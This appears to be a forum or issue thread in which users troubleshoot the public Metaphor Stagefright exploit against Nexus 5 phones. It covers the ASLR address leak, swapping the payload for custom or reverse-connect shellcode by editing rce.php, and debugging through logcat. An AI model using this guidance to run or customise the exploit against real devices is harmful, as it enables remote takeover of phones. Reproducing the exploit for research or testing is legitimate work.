Exploit Output

[TirelessMan]

Hi,
I am going to use your methaphor implementation codes, I have run a web server and connect to that in my Nexus 5 using chrome, I have so many mp4 files in leak folder and in rce folder i have 2 mp4 files in each run respectively.
In my terminal i check the media server process ID and i see that has been crashed.
But I can not see any thing about exploit Output, In short I don't know what and where is the exploit output! I have read your paper many times.
If at the end, some data will be leaked from victim device, where these data will be saved? and how can i check this data are very from victim device?
Thanks in advance.

[rootkitor]

You need to read carefully enough to understand the whole exploit,then you'll find out how the leaked libc.so base address being used.

[TirelessMan]

Thanks rootkitor, I dont know what is the output of exploit yet! I know the exploit process and flow chart, but i do not understand at the end i will get how much data from the victim memmory and where this leaked data will saved?

[rootkitor]

Hi,We can leak 8 bytes ( with some limits) from the mediaserver's memory by overwrite the MetaData object. Researchers from NorthBit choose to leak two values from ELF header to locate a library in memory. Due to the android aslr slide,we can calculate the libc.so address. It's very smart because there are many restrictions they have to bypass.Once you got libc.so base address, you can generate and deliver the final rce mp4 file. This exploit use the leaked data immediately,and will not save it because the base address changed every time the mediaserver restart.

[TirelessMan]

Hi rootkitor, I read the document again and run the Metaphor for my Nexus 5 device, now i see at the end that the PC (program counter) is set to 3700!
I changed the shell code content to 3800 for example , and this set PC to 3800 hopefully.
I think this is all of the privilege escalation of NorthBit Researchers in Metaphor project.
If so, I wanna to execute my own shell code instead of NorthBit embedded shell code. For example I want to open a port on the Device or run a Impressive command.
Did you test your own shell code in Methaphor project rootkitor? and how can I use my own shell code? thanks in advance

[rootkitor]

You can replace the shellcode with your own by editing rce.php.

[secmart]

Hi, I also have a problem with the shellcode.
I replaced your shellcode with this one http://shell-storm.org/shellcode/files/shellcode-754.php
When I compile it copy to the phone (Nexus 5 with LRX22C) make it executable and run it, I get a connection back to my pc.
But when I try to import it into the exploit by changing rce.php I only get the two mp4 files in the rce folder but I don't get a connection back to my PC.
In the rce file I changed the shellcode path and removed the three paramters (-1 -2 -3) at the end, because all the connection info is already in the shellcode.
What did I make wrong?
Where can I look to find the problem?
thanks in advance

[Enilos]

Hi,

I tried to use Metaphor. I use a Xampp server.
Mediaserver crashed :

Once my device is connected to the attack page (/web/index.php) I displayed the pid of mediaserver via adb shell, and it has changed.

I have created the rce and leaks folders, with correct permissions, and the leaks videos and the 2 rce videos are generated. However, it seems the bx_0x3700.bin has no effect.

A redirection from "[...]/web/index.php" to "[...]/web/rce.php?addr=b6ef7000" occured, and an empty video appears.

Might you explain me how I could see the PC (program counter), please ?
Do you have an idea of where my problem come from ? Did I miss a step ?

Thank you in advance for your response.

[TirelessMan]

Hi SolineBlanc, You can use adb logcat command to see your device logcat. In the logs content you can see your PC is changed to 0x3700.

[Enilos]

Thank you very much :D

It does not work yet (adb logcat | grep 0x3700 does not return anything), but this command line will be useful to find out why. I hope to come back soon, with more questions, or an answer ;)

Thank you again !

[nermin-yehia]

Hi All,
i tried to run metaphor on Nexus 5 device, after redirect ro rce.php i got that error in logcat what does that mean?

08-20 16:41:17.682 31502-31854/? I/NuCachedSource2: ERROR_END_OF_STREAM
08-20 16:41:17.688 31502-31539/? E/StagefrightMetadataRetriever: Unable to instantiate an extractor for 'http://192.168.1.13/metaphor_original/web/rce.php?addr=b6ed6000'.
08-20 16:41:17.699 29230-29339/? E/MediaResourceGetter: Error configuring data source
java.lang.RuntimeException: setDataSource failed: status = 0x80000000
at android.media.MediaMetadataRetriever._setDataSource(Native Method)
at android.media.MediaMetadataRetriever.setDataSource(MediaMetadataRetriever.java:105)
at org.chromium.content.browser.MediaResourceGetter.configure(MediaResourceGetter.java:412)
at org.chromium.content.browser.MediaResourceGetter.configure(MediaResourceGetter.java:254)
at org.chromium.content.browser.MediaResourceGetter.extract(MediaResourceGetter.java:148)
at org.chromium.content.browser.MediaResourceGetter.extractMediaMetadata(MediaResourceGetter.java:120)
08-20 16:41:17.700 29230-29339/? E/MediaResourceGetter: Unable to configure metadata extractor

i also couldn't get pc from logcat

Thanks